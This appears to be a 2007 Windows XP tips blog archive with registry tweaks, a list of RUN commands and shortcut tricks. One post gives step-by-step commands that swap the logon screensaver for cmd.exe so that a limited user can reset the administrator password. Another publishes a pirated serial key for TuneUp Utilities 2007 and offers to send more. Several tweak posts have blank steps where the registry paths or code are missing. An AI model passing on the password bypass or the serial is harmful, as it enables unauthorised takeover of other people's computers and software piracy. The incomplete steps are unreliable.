Monday, June 18, 2007

To create a Copy To command to Right Click Context Menu:

1. Navigate to the following Registry Value:


2. Create a sub-key named Copy To

3. Copy and Paste the following value:

4. Restart if needed.

Thursday, June 14, 2007

Some Usefull Shortcuts:

Usefull RUN Commands:

Accessibility Controls : access.cpl

Add Hardware Wizard : hdwwiz.cpl

Add/Remove Programs : appwiz.cpl

Administrative Tools : control admintools

Automatic Updates : wuaucpl.cpl

Bluetooth Transfer Wizard : fsquirt

Calculator : calc

Certificate Manager : certmgr.msc

Character Map : charmap

Check Disk Utility : chkdsk

Clipboard Viewer : clipbrd

Command Prompt : cmd

Component Services : dcomcnfg

Computer Management : compmgmt.msc

Date and Time Properties : timedate.cpl

DDE Shares : ddeshare

Device Manager : devmgmt.msc

Direct X Control Panel (If Installed)* : directx.cpl

Direct X Troubleshooter : dxdiag

Disk Cleanup Utility : cleanmgr

Disk Defragment : dfrg.msc

Disk Management : diskmgmt.msc

Disk Partition Manager : diskpart

Display Properties : control desktop

Display Properties : desk.cpl

Display Properties (w/Appearance Tab Preselected) : control color

Dr. Watson System Troubleshooting Utility : drwtsn32

Driver Verifier Utility : verifier

Event Viewer : eventvwr.msc

File Signature Verification Tool : sigverif

Findfast : findfast.cpl

Folders Properties : control folders

Fonts : control fonts

Free Cell Card Game : freecell

Game Controllers : joy.cpl

Group Policy Editor (XP Prof) : gpedit.msc

Hearts Card Game : mshearts

Iexpress Wizard : iexpress

Indexing Service : ciadv.msc

Internet Properties : inetcpl.cpl

Wednesday, June 13, 2007

Hack Windows XP Admin Password:

Want to hack the Administrator Password with your Limited Account. Here is a simple method:

1. Open Dos Prompt.

2. Do the following steps:

cd\ Drops to root
cd\windows\system32 Directs to the system32 dir
mkdir temphack Creates the folder temphack
copy logon.scr temphack\logon.scr Backsup logon.scr
copy cmd.exe temphack\cmd.exe Backsup cmd.exe
del logon.scr Deletes original logon.scr
rename cmd.exe logon.scr Renames cmd.exe to logon.scr
exit Quits DOS

3. Restart the Machine and when the OS loaded it will load the DOS-Prompt

4. Use the Following Commands.

net user admin admin

5. It will set the system Admin as Username and admin as your new Password with the Admnistrator Rights.

6. Copy the contents of temphack and back into the system32 directory.

7. Reboot.

Sunday, June 10, 2007

Disable Passport Balloon:

1. Start the Registry Editor.

2. Move to the following Registry value

3. Create a New Binary Value and set the value as below
Name : PassportBalloon
Data Value : 0A 00 00 00

4. Reboot your PC.

Saturday, June 9, 2007

Hide the Recycle Bin from your Desktop:

1. Open the Notepad and copy the following code.





2. Save the file with the extension of .reg(Hide_Bin.reg).

3. Run the File and it will remove the Recycle Bin from your Desktop.

Remove Shortcut Arrows from Desktop Icon:

1. Start regedit.

2. Navigate to the following registry value
HKEY_CLASSES_ROOT -- > lnkfile

3. Delete the IsShortcut registry value in the right pane.

4. Reboot your PC.


Before editing regisrty take a back up of regisrty.

Thursday, June 7, 2007

TuneUp Utillities 2007 - Serial

TuneUp Utillities 2007 - Serial

Name : KayDeeAar
Company : KayDeeAar
Serial : TTEWN-A4DQA-6MMH7-D69A3-5F9Y5-M6AXS

TuneUp Utillities Download Link:

Download Here use the above registration codes to make your Sofware full version.

If you want to register the software in your name leave your details in comments or mail me at
(It takes 2-3 days to send the Serial Keys)

Tuesday, June 5, 2007

Command Line Help Reference

1. Create a shortcut using the following Code.

hh.exe ms-its:C:\WINDOWS\Help\ntcmds.chm::/ntcmds.htm

2. You can learn all the Command using in Windows Command Prompt.

Opening an Explorer Window to the Directory You Want:

1. Creat a New Shortcut using the following code.

2. I want to create a shortcut to C:\Songs Explorer folder in Desktop.
%SystemRoot%\explorer.exe /n, /e, c:\songs

3. Then it will create a Songs Explorer Folder in Desktop.You can Single Click to Explore your Songs Folder.

Disabling Balloon Tips:

1. Start Regedit

2. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\

3. Create a DWORD value of EnableBalloonTips

4. Give it a value of 0

Monday, June 4, 2007

Speeding up the Display of Start Menu Items:

1. Right click on an open area of the Desktop.

2. Select Properties.

3. Click on the Appearance tab.

4. Click on the Effects button.

5. Uncheck Show shadows under menus.

Change the Media Player Title:

1. Start the Registry Editor.

2. Navigate tto the following registry value:

3. Create a New Key "WindowsMediaPlayer".(Without Quotes)

4. Create a New String Value as "TitleBar" (Without Quotes) and change the value to whatever you want

5. Reboot your PC.